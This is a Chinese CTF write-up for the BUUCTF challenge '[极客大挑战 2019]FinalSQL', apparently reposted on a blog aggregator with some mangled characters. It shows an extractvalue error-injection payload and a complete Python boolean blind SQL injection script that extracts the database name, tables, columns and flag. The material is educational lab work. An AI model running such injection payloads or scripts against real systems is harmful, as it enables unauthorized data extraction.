CTF-Web-[极客大挑战 2019]FinalSQL
CTF-Web-[极客大挑战 2019]FinalSQL
博客说明php
文章所涉及的资料来自互联网整理和我的总结,意在于我的学习和经验汇总,若有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!
CTP平台
网址node
https://buuoj.cn/challengespython
题目
Web类,[极客大挑战 2019]FinalSQLsql
打开题目的实例数据库
思路
SQl的题目,首先试一试万能密码(虽然不可能,可是仍是得试一下)学习
试一下双写url
看来被封死了,想一想其余的办法,能够使用extractvalue和updatexml进行报错注入,空格和=号没有,因此咱们要使用()来代替空格,使用like来代替=号spa
使用extractvalue()3d
/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database()))))%23
看来是增强到最后一版本了,仔细查看它的提示,试一试盲注code
盲注
试着写脚本,不用试着了,网上大神的脚本
# -*- coding: utf-8 -*-
# @Author: jiaoben
# @Date : 2020/05/03
import re
import requests
import string
url = "http://dcf33d60-7ffa-41c0-8915-e935ccbdd37b.node3.buuoj.cn//search.php"
flag = ''
def payload(i, j):
# 数据库名字
sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)
# 表名
# sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,j)
# 列名
# sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,j)
# 查询flag
# sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, j)
data = {"id": sql}
r = requests.get(url, params=data)
# print (r.url)
if "Click" in r.text:
res = 1
else:
res = 0
return res
def exp():
global flag
for i in range(1, 10000):
print(i, ':')
low = 31
high = 127
while low <= high:
mid = (low + high) // 2
res = payload(i, mid)
if res:
low = mid + 1
else:
high = mid - 1
f = int((low + high + 1)) // 2
if (f == 127 or f == 31):
break
# print (f)
flag += chr(f)
print(flag)
exp()
print('flag=', flag)
取消数据库的注释
猜想为geek数据库
爆表
以上的代码选择查询数据表的那行就好了
找到两个字段,尝试F1naI1y
爆字段
以上的代码选择查询数据列的那行就好了
找到3个字段,能够选择password
爆数据
以上的代码选择查询flag的那行就好了
flag就找到了
感谢
BUUCTF以及勤劳的本身
相关文章
- 1. [极客大挑战 2019]HardSQL
- 2. [极客大挑战 2019]Knife
- 3. 极客大挑战 secret file
- 4. [极客大挑战 2019]BabySQL
- 5. buuctf 极客大挑战 buyflag
- 6. BUU_Web 极客大挑战 Upload
- 7. [极客大挑战 2019]Http
- 8. [极客大挑战 2019]Havefun
- 9. 极客大挑战 2019 PHP
- 10. [BUUCTF] 极客大挑战 BuyFlag
- 更多相关文章...
- • XSLT - 在客户端 - XSLT 教程
- • Docker 命令大全 - Docker教程
- • JDK13 GA发布:5大特性解读
- • Git可视化极简易教程 — Git GUI使用方法
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. vs2019运行opencv图片显示代码时,窗口乱码
- 2. app自动化 - 元素定位不到?别慌,看完你就能解决
- 3. 在Win8下用cisco ××× Client连接时报Reason 422错误的解决方法
- 4. eclipse快速补全代码
- 5. Eclipse中Java/Html/Css/Jsp/JavaScript等代码的格式化
- 6. idea+spring boot +mabitys(wanglezapin)+mysql (1)
- 7. 勒索病毒发生变种 新文件名将带有“.UIWIX”后缀
- 8. 【原创】Python 源文件编码解读
- 9. iOS9企业部署分发问题深入了解与解决
- 10. 安装pytorch报错CondaHTTPError:******
欢迎关注本站公众号,获取更多信息
